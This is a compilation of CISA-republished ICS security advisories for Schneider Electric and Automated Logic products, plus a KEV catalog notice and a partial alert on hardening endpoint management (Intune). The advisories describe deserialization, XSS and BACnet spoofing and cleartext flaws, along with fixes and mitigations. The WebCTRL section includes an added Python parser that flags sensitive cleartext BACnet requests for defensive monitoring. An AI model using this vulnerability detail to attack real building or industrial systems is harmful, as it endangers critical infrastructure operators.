Firmware version 5.4.10.12, delivered with EcoStruxure™ Machine Expert v2.5, includes a fix for this vulnerability and can be installed through the Schneider Electric Software Installer, available here: https://www.se.com/ww/en/download/document/ESEMACS10_INSTALLER/.
• On the engineering workstation, install v2.5.0.1 of EcoStruxure™ Machine Expert. For help, refer to the Schneider Electric Software Installer User Guide: https://www.se.com/ww/en/download/document/EIO0000005500/.
• Update the Modicon Controller M262 to the latest firmware and perform a reboot. For instructions, refer to the Modicon M262 Logic/Motion Controller, Programming Guide: https://www.se.com/ww/en/download/document/ESEMACS10_INSTALLER/.

For more information, see the associated Schneider Electric CPCERT security advisory SEVD-2026-069-01, Improper Resource Shutdown or Release vulnerability in Multiple Products:
• PDF version: https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-069-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-069-01.pdf
• CSAF version: https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-069-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=sevd-2026-069-01.json

All affected products: if customers choose not to apply the remediation provided above, they should immediately apply the following mitigations to reduce the risk of exploit:
• Use controllers and devices only in a protected environment to minimize network exposure and ensure that they are not accessible from the public internet or untrusted networks.
• Filter ports and IP addresses through the embedded firewall.
• Use encrypted communication links.
• Use VPN (Virtual Private Network) tunnels if remote access is required.
The "Cybersecurity Guidelines for EcoStruxure Machine Expert, Modicon and PacDrive Controllers and Associated Equipment" provide product-specific hardening guidelines: https://download.schneider-electric.com/files?p_enDocType=User+guide&p_File_Name=EIO0000004242.00.pdf&p_Doc_Ref=EIO0000004242

Acknowledgments
Amir Zaltzman of Claroty Team82 reported this vulnerability to Schneider Electric. Schneider Electric reported this vulnerability to CISA.

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:
• Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
• Locate control system networks and remote devices behind firewalls and isolate them from business networks.
• When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize that VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:
• Do not click web links or open attachments in unsolicited email messages.
• Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
• Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.
No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-03-19
2026-03-19, Revision 1: Initial Republication of Schneider Electric CPCERT SEVD-2026-069-01

Schneider Electric EcoStruxure PME and EPO

Summary
Schneider Electric is aware of a vulnerability in its EcoStruxure Power Monitoring Expert (PME) and EcoStruxure Power Operation (EPO) products. EcoStruxure Power Monitoring Expert (PME) is on-premises software used to help power-critical and energy-intensive facilities maximize uptime and operational efficiency. EcoStruxure Power Operation (EPO) is an on-premises software offer that provides a single platform to monitor and control medium and lower power systems. Failure to apply the fix provided below may risk local arbitrary code execution, which could result in the local system being compromised, a disruption of operations, and/or unauthorized administrative control of the system.

Affected Products
The following versions of Schneider Electric EcoStruxure PME and EPO are affected (the product tree also lists the hotfixed builds):
• EcoStruxure Power Monitoring Expert (PME) 2022 and prior (<=2022)
• EcoStruxure Power Monitoring Expert (PME) 2023
• EcoStruxure Power Monitoring Expert (PME) 2023_R2
• EcoStruxure Power Monitoring Expert (PME) 2024
• EcoStruxure Power Monitoring Expert (PME) 2024_R2
• EcoStruxure Power Operation (EPO) 2022 Advanced Reporting and Dashboards Module and prior (<=2022)
• EcoStruxure Power Operation (EPO) Advanced Reporting and Dashboards Module 2024
• EcoStruxure Power Monitoring Expert (PME) 2023_R2_Hotfix_282807
• EcoStruxure Power Monitoring Expert (PME) 2024_R2_Hotfix_279338__2024R2
Product status: fixed, known_affected.

CVSS v3: 7.8
Vendor: Schneider Electric
Equipment: EcoStruxure PME and EPO
Vulnerability: Deserialization of Untrusted Data

Background
Critical Infrastructure Sectors: Healthcare and Public Health, Information Technology, Critical Manufacturing, Commercial Facilities, Energy, Transportation Systems, Government Services and Facilities, Water and Wastewater
Countries/Areas Deployed: Worldwide
Company Headquarters Location: France

Vulnerabilities

CVE-2025-11739 (CWE-502 Deserialization of Untrusted Data)
A deserialization of untrusted data vulnerability exists that could cause arbitrary code execution with administrative privileges when a locally authenticated attacker sends a crafted data stream, triggering unsafe deserialization.
Affected product versions: EcoStruxure Power Monitoring Expert (PME) Version 2022 and prior; PME Version 2023; PME Version 2023 R2; PME Version 2024; PME Version 2024 R2; EcoStruxure Power Operation (EPO) 2022 Advanced Reporting and Dashboards Module Version 2022 and prior; EcoStruxure Power Operation (EPO) 2024 with Advanced Reporting and Dashboards Module Version 2024.
CVSS v3.1 base score 7.8 (HIGH); vector string CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Remediations

Vendor fixes
• Hotfix_279338_Release_2024R2 is available for EcoStruxure Power Monitoring Expert (PME) and includes a fix for this vulnerability. Contact Schneider Electric’s Customer Care Center to download this hotfix. No reboot required.
• Customers should upgrade to EcoStruxure Power Monitoring Expert (PME) 2024 R3. Contact Schneider Electric’s Customer Care Center for assistance.
• Hotfix_282807 (for 2023R2) is available for EcoStruxure Power Monitoring Expert (PME) and includes a fix for this vulnerability. Contact Schneider Electric’s Customer Care Center to download this hotfix. No reboot required.
• Customers should upgrade to EcoStruxure Power Monitoring Expert (PME) 2023 R2. Once upgraded, Hotfix_282807 (for 2023R2) is available for EcoStruxure Power Monitoring Expert (PME) and includes a fix for this vulnerability. Contact Schneider Electric’s Customer Care Center for assistance.

No fix planned
EcoStruxure Power Operation (EPO) 2022 and EcoStruxure Power Monitoring Expert (PME) 2022 have reached end of life and are no longer supported.
• Ensure your deployment of PME has followed the cybersecurity hardening guidelines provided with the product: https://product-help.schneider-electric.com/EcoStruxure/Power-Monitoring-Expert-2024/content/2_planning/cybersecurity/cyber-planningrecactions.htm
• Ensure PME is running in an isolated network.
• Deploy and configure the Windows firewall to limit access to appropriate network segments.
• Enforce complex password policies.
• Review server access permissions:
  o Conduct an audit of all Windows-authenticated users who currently have access to PME. Repeat this audit of your system periodically.
  o Identify all accounts with access rights, especially those with elevated privileges or remote access.
  o Limit access to essential users only.
  o Revoke access for any user accounts that are not critical for system functionality or daily operations.
  o Apply the principle of least privilege to ensure users have only the access necessary for their role(s).
Customers should also consider upgrading to the latest product offering, EcoStruxure Power Monitoring Expert (PME) 2024 R3, to resolve this issue.

Acknowledgments
Schneider Electric reported this vulnerability to CISA.

General Security Recommendations
Schneider Electric strongly recommends the following industry cybersecurity best practices (https://www.se.com/us/en/download/document/7EN52-0390/):
* Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.
* Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks.
* Place all controllers in locked cabinets and never leave them in the “Program” mode.
* Never connect programming software to any network other than the network intended for that device.
* Scan all methods of mobile data exchange with the isolated network, such as CDs, USB drives, etc., before use in the terminals or any node connected to these networks.
* Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.
* Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.
* When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.
For more information, refer to the Schneider Electric Recommended Cybersecurity Best Practices document.

For More Information
This document provides an overview of the identified vulnerability or vulnerabilities and the actions required to mitigate them. For more details and assistance on how to protect your installation, contact your local Schneider Electric representative or Schneider Electric Industrial Cybersecurity Services: https://www.se.com/ww/en/work/solutions/cybersecurity/. These organizations will be fully aware of this situation and can support you through the process.
For further information related to cybersecurity in Schneider Electric’s products, visit the company’s cybersecurity support portal page: https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp

LEGAL DISCLAIMER
THIS NOTIFICATION DOCUMENT, THE INFORMATION CONTAINED HEREIN, AND ANY MATERIALS LINKED FROM IT (COLLECTIVELY, THIS “NOTIFICATION”) ARE INTENDED TO HELP PROVIDE AN OVERVIEW OF THE IDENTIFIED SITUATION AND SUGGESTED MITIGATION ACTIONS, REMEDIATION, FIX, AND/OR GENERAL SECURITY RECOMMENDATIONS AND IS PROVIDED ON AN “AS-IS” BASIS WITHOUT WARRANTY OR GUARANTEE OF ANY KIND. SCHNEIDER ELECTRIC DISCLAIMS ALL WARRANTIES RELATING TO THIS NOTIFICATION, EITHER EXPRESS OR IMPLIED, INCLUDING WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. SCHNEIDER ELECTRIC MAKES NO WARRANTY THAT THE NOTIFICATION WILL RESOLVE THE IDENTIFIED SITUATION. IN NO EVENT SHALL SCHNEIDER ELECTRIC BE LIABLE FOR ANY DAMAGES OR LOSSES WHATSOEVER IN CONNECTION WITH THIS NOTIFICATION, INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF SCHNEIDER ELECTRIC HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. YOUR USE OF THIS NOTIFICATION IS AT YOUR OWN RISK, AND YOU ARE SOLELY LIABLE FOR ANY DAMAGES TO YOUR SYSTEMS OR ASSETS OR OTHER LOSSES THAT MAY RESULT FROM YOUR USE OF THIS NOTIFICATION. SCHNEIDER ELECTRIC RESERVES THE RIGHT TO UPDATE OR CHANGE THIS NOTIFICATION AT ANY TIME AND IN ITS SOLE DISCRETION.

About Schneider Electric
Schneider's purpose is to create impact by empowering all to make the most of our energy and resources, bridging progress and sustainability for all. We call this Life Is On. Our mission is to be the trusted partner in sustainability and efficiency. We are a global industrial technology leader bringing world-leading expertise in electrification, automation and digitization to smart industries, resilient infrastructure, future-proof data centers, intelligent buildings, and intuitive homes.
Anchored by our deep domain expertise, we provide integrated end-to-end lifecycle AI enabled industrial IoT solutions with connected products, automation, software and services, delivering digital twins to enable profitable growth for our customers. We are a people company with an ecosystem of 150,000 colleagues and more than a million partners operating in over 100 countries to ensure proximity to our customers and stakeholders. We embrace diversity and inclusion in everything we do, guided by our meaningful purpose of a sustainable future for all. www.se.com Note EcoStruxure Power Operation 2022 with Advanced Reporting AND EcoStruxure Power Operation 2024 with Advanced Reporting utilizes EcoStruxure Power Monitoring Expert. You must update EcoStruxure Power Monitoring Expert separately from EcoStruxure Power Operation and apply the appropriate update for Power Monitoring Expert as described above. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. 
Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Schneider Electric SEVD-2026-069-06 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Schneider Electric directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-03-10 Date Revision Summary 2026-03-10 1 Original Release 2026-03-19 2 Initial CISA Republication of Schneider Electric SEVD-2026-069-06 advisory Legal Notice and Terms of Use

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
* CVE-2026-20131: Cisco Secure Firewall Management Center (FMC) Software and Cisco Security Cloud Control (SCC) Firewall Management Deserialization of Untrusted Data Vulnerability
This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Automated Logic WebCTRL Premium Server

Summary
Successful exploitation of these vulnerabilities could allow an attacker to read, intercept, or modify communications. The following versions of Automated Logic WebCTRL Premium Server are affected: WebCTRL Premium Server (versions prior to v8.5; see Affected Products below).
CVSS v3: 9.1
Vendor: Automated Logic
Equipment: Automated Logic WebCTRL Premium Server
Vulnerabilities: Multiple Binds to the Same Port, Authentication Bypass by Spoofing, Cleartext Transmission of Sensitive Information

Background
Critical Infrastructure Sectors: Commercial Facilities
Countries/Areas Deployed: Worldwide
Company Headquarters Location: United States

Vulnerabilities
CVE-2026-25086: Under certain conditions, an attacker could bind to the same port used by WebCTRL. This could allow the attacker to craft and send malicious packets and impersonate the WebCTRL service without requiring code injection into the WebCTRL software.
Relevant CWE: CWE-605 Multiple Binds to the Same Port
CVSS v3.1 base score: 7.7 (HIGH); vector string: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVE-2026-32666: WebCTRL systems that communicate over BACnet inherit the protocol's lack of network-layer authentication. WebCTRL does not implement additional validation of BACnet traffic, so an attacker with network access could spoof BACnet packets directed at either the WebCTRL server or associated Automated Logic controllers. Spoofed packets may be processed as legitimate.
Relevant CWE: CWE-290 Authentication Bypass by Spoofing
CVSS v3.1 base score: 7.5 (HIGH); vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2026-24060: Service information is not encrypted when transmitted as BACnet packets over the wire, and can be sniffed, intercepted, and modified by an attacker. Valuable information such as the File Start Position and File Data can be sniffed from network traffic using Wireshark's BACnet dissector filter. The proprietary format used by WebCTRL to receive updates from the PLC can also be sniffed and reverse engineered.
Relevant CWE: CWE-319 Cleartext Transmission of Sensitive Information
CVSS v3.1 base score: 9.1 (CRITICAL); vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Affected Products (all three CVEs)
Automated Logic WebCTRL Premium Server
Vendor: Automated Logic
Product Version: Automated Logic WebCTRL Premium Server: <v8.5
Product Status: known_affected

Remediations (all three CVEs)
Mitigation: Automated Logic notes that WebCTRL 7 is End of Life (EOL) and has been out of support since January 27, 2023. Users are advised to upgrade to the latest version of the WebCTRL server application, which supports the more secure BACnet/SC.
Mitigation: For customers using supported versions of WebCTRL (WebCTRL 8.5 cumulative releases and later), Automated Logic provides secure configuration guidance for hardware and software deployments; BACnet Secure Connect (BACnet/SC) support, which introduces TLS encryption and mutual authentication; and published best practices for network segmentation, access control, and secure protocol implementation. Additional information is available at: https://www.automatedlogic.com/en/company/security-commitment/

Acknowledgments
Jonathan Lee, Thuy D. Nguyen and Neil C. Rowe of the Naval Postgraduate School reported these vulnerabilities to CISA.
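The spoofing and cleartext-transmission findings above are exactly what a passive monitor on the BACnet segment can surface while plain BACnet/IP (rather than BACnet/SC) is still in use. The following parser is an added example, not Automated Logic's or CISA's code: it decodes the BVLC, NPDU and APDU layers of a BACnet/IP datagram far enough to name the confirmed service and flags the services that carry file contents, property writes or device control in cleartext; the service-choice numbers come from the BACnet standard, the set of services treated as sensitive is this example's own choice, and all datagrams are constructed samples.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Confirmed service choices from ASHRAE 135 (BACnet). The ones listed in
# SENSITIVE_SERVICES carry file data, property writes or device control and
# travel in cleartext over plain BACnet/IP (CWE-319 in the advisory above).
CONFIRMED_SERVICES = {
    6: "atomicReadFile", 7: "atomicWriteFile", 12: "readProperty",
    14: "readPropertyMultiple", 15: "writeProperty",
    16: "writePropertyMultiple", 17: "deviceCommunicationControl",
    20: "reinitializeDevice",
}
SENSITIVE_SERVICES = {"atomicReadFile", "atomicWriteFile", "writeProperty",
                      "writePropertyMultiple", "deviceCommunicationControl",
                      "reinitializeDevice"}


@dataclass
class BacnetRequest:
    bvlc_function: int   # 0x0a Original-Unicast-NPDU, 0x0b Original-Broadcast
    invoke_id: int
    service: str
    sensitive: bool


def parse_bacnet_ip(payload: bytes) -> Optional[BacnetRequest]:
    """Decode BVLC -> NPDU -> APDU far enough to name a confirmed request."""
    # BVLC header: type 0x81 (BACnet/IP), function, 16-bit total length.
    if len(payload) < 4 or payload[0] != 0x81:
        return None
    if int.from_bytes(payload[2:4], "big") != len(payload):
        return None                       # truncated or padded datagram
    function = payload[1]
    if function not in (0x0A, 0x0B):      # only NPDU-carrying functions here
        return None
    pos = 4
    if payload[pos] != 0x01:              # NPDU protocol version
        return None
    control = payload[pos + 1]
    pos += 2
    if control & 0x80:
        return None                       # network-layer message, no APDU
    if control & 0x20:                    # DNET, DLEN, DADR present
        pos += 3 + payload[pos + 2]
    if control & 0x08:                    # SNET, SLEN, SADR present
        pos += 3 + payload[pos + 2]
    if control & 0x20:
        pos += 1                          # hop count follows the addresses
    if pos + 4 > len(payload) or (payload[pos] >> 4) != 0x0:
        return None                       # not a Confirmed-Request PDU
    segmented = bool(payload[pos] & 0x08)
    invoke_id = payload[pos + 2]
    pos += 3 + (2 if segmented else 0)    # skip sequence number + window size
    if pos >= len(payload):
        return None
    service = CONFIRMED_SERVICES.get(payload[pos],
                                     f"confirmed-service-{payload[pos]}")
    return BacnetRequest(function, invoke_id, service,
                         service in SENSITIVE_SERVICES)


def flag_cleartext_requests(datagrams: List[bytes]) -> List[Tuple[int, str]]:
    """Index and service name of every datagram a monitor should alert on."""
    hits = []
    for i, dgram in enumerate(datagrams):
        req = parse_bacnet_ip(dgram)
        if req is not None and req.sensitive:
            hits.append((i, req.service))
    return hits


def _build(service_choice: int, body: bytes, routed: bool = False) -> bytes:
    """Constructed Original-Unicast-NPDU datagram (sample data, not captured)."""
    npdu = (bytes([0x01, 0x24, 0x00, 0x05, 0x01, 0x0B, 0xFF]) if routed
            else bytes([0x01, 0x04]))     # routed: DNET 5, DADR 0x0B, hops 255
    apdu = bytes([0x00, 0x05, 0x01, service_choice]) + body
    total = 4 + len(npdu) + len(apdu)
    return bytes([0x81, 0x0A]) + total.to_bytes(2, "big") + npdu + apdu


SAMPLES = [
    # readProperty device,1 object-name: benign enumeration, not flagged
    _build(12, bytes.fromhex("0c 02000001 19 4d")),
    # atomicReadFile file,1 stream access from offset 0, 64 octets
    _build(6, bytes.fromhex("c4 02800001 0e 31 00 21 40 0f")),
    # writeProperty analog-value,2 present-value = 50.0, via a BACnet router
    _build(15, bytes.fromhex("0c 00800002 19 55 3e 44 42480000 3f"), routed=True),
    # atomicWriteFile file,1 stream access, offset 0, one octet "A"
    _build(7, bytes.fromhex("c4 02800001 0e 31 00 61 41 0f")),
    bytes.fromhex("81 0a 00 03"),         # malformed: BVLC length mismatch
]

if __name__ == "__main__":
    for idx, svc in flag_cleartext_requests(SAMPLES):
        print(f"datagram {idx}: cleartext {svc} over BACnet/IP")
```

Fed UDP/47808 payloads from a span port, the same function tells you which controllers still exchange file and write traffic in the clear and therefore where the BACnet/SC migration in the remediation above matters most.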
Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
* Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
* Locate control system networks and remote devices behind firewalls and isolate them from business networks.
* When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize a VPN is only as secure as the connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:
* Do not click web links or open attachments in unsolicited email messages.
* Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
* Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-03-19
2026-03-19, Revision 1: Initial Publication

Schneider Electric Modicon Controllers M241, M251, M258, and LMC058

Summary
Successful exploitation of this vulnerability may risk a Cross-site Scripting or an open redirect attack, which could result in an account takeover scenario or the execution of code in the user's browser. The following versions of Schneider Electric Modicon Controllers M241, M251, M258, and LMC058 are affected:
* Modicon M241 versions prior to 5.4.13.12 (Modicon_Controller_M241)
* Modicon M251 versions prior to 5.4.13.12 (Modicon_Controller_M251)
* Modicon Controllers M258, all firmware versions (Modicon_Controllers_M258)
* Modicon Controllers LMC058, all firmware versions (Modicon_Controllers_LMC058)
CVSS v3: 5.4
Vendor: Schneider Electric
Equipment: Schneider Electric Modicon Controllers M241, M251, M258, and LMC058
Vulnerabilities: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Background
Critical Infrastructure Sectors: Commercial Facilities, Critical Manufacturing, Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: France

Vulnerabilities
CVE-2025-13902: A CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists that could allow authenticated attackers to have a victim's browser run arbitrary JavaScript when the victim hovers over a maliciously crafted element on a web server containing the injected payload.

Affected Products
Schneider Electric Modicon Controllers M241, M251, M258, and LMC058
Vendor: Schneider Electric
Product Version: Schneider Electric Modicon M241 versions prior to 5.4.13.12 (Modicon_Controller_M241); Schneider Electric Modicon M251 versions prior to 5.4.13.12 (Modicon_Controller_M251); Schneider Electric Modicon Controllers M258, all firmware versions (Modicon_Controllers_M258); Schneider Electric Modicon Controllers LMC058, all firmware versions (Modicon_Controllers_LMC058)
Product Status: known_affected

Remediations
Schneider Electric has identified the following specific workarounds and mitigations users can apply to reduce risk.

Mitigation, Modicon Controller M241: Firmware version 5.4.13.12, delivered with EcoStruxure™ Machine Expert v2.5.0.1, includes a fix for this vulnerability and can be installed through Schneider Electric Software Installer, available here: https://www.se.com/ww/en/download/document/ESEMACS10_INSTALLER/. On the engineering workstation, install v2.5.0.1 of EcoStruxure™ Machine Expert; for help refer to the Schneider Electric Software Installer User Guide, available here: https://www.se.com/ww/en/download/document/EIO0000005500/. Update the Modicon Controller M241 to the latest firmware and perform a reboot; for instructions refer to the Modicon M241 Logic Controller Programming Guide: https://www.se.com/ww/en/download/document/EIO0000003059/.

Mitigation, Modicon Controller M251: Firmware version 5.4.13.12, delivered with EcoStruxure™ Machine Expert v2.5.0.1, includes a fix for this vulnerability and can be installed through Schneider Electric Software Installer, available here: https://www.se.com/ww/en/download/document/ESEMACS10_INSTALLER/. On the engineering workstation, install v2.5.0.1 of EcoStruxure™ Machine Expert; for help refer to the Schneider Electric Software Installer User Guide, available here: https://www.se.com/ww/en/download/document/EIO0000005500/. Update the Modicon Controller M251 to the latest firmware and perform a reboot; for instructions refer to the Modicon M251 Logic Controller Programming Guide: https://www.se.com/us/en/download/document/EIO0000003089/.

Mitigation: If customers choose not to apply the remediation provided above, they should immediately apply the following mitigations to reduce the risk of exploit:
* Use controllers and devices only in a protected environment to minimize network exposure and ensure that they are not accessible from the public internet or untrusted networks.
* Ensure usage of user management and password features. User rights are enabled by default and force the creation of a strong password at first use.
* Deactivate the Webserver after use when not needed.
* Use encrypted communication links.
* Set up network segmentation and implement a firewall to block all unauthorized access to ports 80/HTTP and 443/HTTPS.
* Use VPN (Virtual Private Network) tunnels if remote access is required.
The "Cybersecurity Guidelines for EcoStruxure Machine Expert, Modicon and PacDrive Controllers and Associated Equipment" provide product-specific hardening guidelines: https://download.schneider-electric.com/files?p_enDocType=User+guide&p_File_Name=EIO0000004242.00.pdf&p_Doc_Ref=EIO0000004242

Mitigation, Modicon Controllers M258 and Modicon Controllers LMC058: Apply the same mitigations listed above (protected environment, user management and password features, Webserver deactivated when not needed, encrypted communication links, network segmentation with a firewall blocking unauthorized access to ports 80/HTTP and 443/HTTPS, and VPN tunnels for remote access). The "Cybersecurity Guidelines for EcoStruxure Machine Expert, Modicon and PacDrive Controllers and Associated Equipment" provide product-specific hardening guidelines: https://download.schneider-electric.com/files?p_enDocType=User+guide&p_File_Name=EIO0000004242.00.pdf&p_Doc_Ref=EIO0000004242

Mitigation: For more information see the associated Schneider Electric CPCERT security advisory SEVD-2026-069-02, Improper Neutralization in Multiple Products.
PDF version: https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-069-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-069-02.pdf
CSAF version: https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-069-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=sevd-2026-069-02.json

Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Metrics
CVSS v3.1 base score: 5.4 (MEDIUM)
Vector string: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Acknowledgments
Amir Zaltzman of Claroty Team82 reported this vulnerability to Schneider Electric. Schneider Electric reported this vulnerability to CISA.

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:
* Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
* Locate control system networks and remote devices behind firewalls and isolate them from business networks.
* When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:
* Do not click web links or open attachments in unsolicited email messages.
* Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
* Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.
No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-03-19
2026-03-19, Revision 1: Initial Republication of Schneider Electric CPCERT SEVD-2026-069-02

0
CISA Urges Endpoint Management System Hardening After Cyberattack Against US Organization

CISA is aware of malicious cyber activity targeting endpoint management systems of U.S. organizations based on the March 11, 2026 cyberattack against U.S.-based medical technology firm Stryker Corporation, which affected their Microsoft environment.[1] To defend against similar malicious cyber activity, CISA urges organizations to harden endpoint management system configurations using the recommendations and resources provided in this alert. CISA is conducting enhanced coordination with federal partners, including the Federal Bureau of Investigation (FBI), to identify additional threats and determine mitigation actions.

To defend against similar malicious activity that misuses legitimate endpoint management software, CISA urges organizations to implement Microsoft's newly released best practices for securing Microsoft Intune. The principles behind these recommendations apply to Intune and, more broadly, to other endpoint management software:
- Use the principle of least privilege when designing administrative roles. Use Microsoft Intune's role-based access control (RBAC) to assign each role the minimum permissions necessary for its day-to-day operations. Permissions cover both the actions a role can take and the users and devices it can apply those actions to.
- Enforce phishing-resistant multi-factor authentication (MFA) and privileged access hygiene. Use Microsoft Entra ID capabilities (including Conditional Access, MFA, risk signals, and privileged access controls) to block unauthorized access to privileged actions in Microsoft Intune.
- Configure access policies to require Multi Admin Approval in Microsoft Intune. Set up policies that require a second administrative account's approval before changes to sensitive or high-impact actions (such as device wiping), applications, scripts, RBAC, configurations, etc. take effect.

Additionally, CISA recommends reviewing the following resources to strengthen defenses against similar malicious cyber activity:

Microsoft resources:
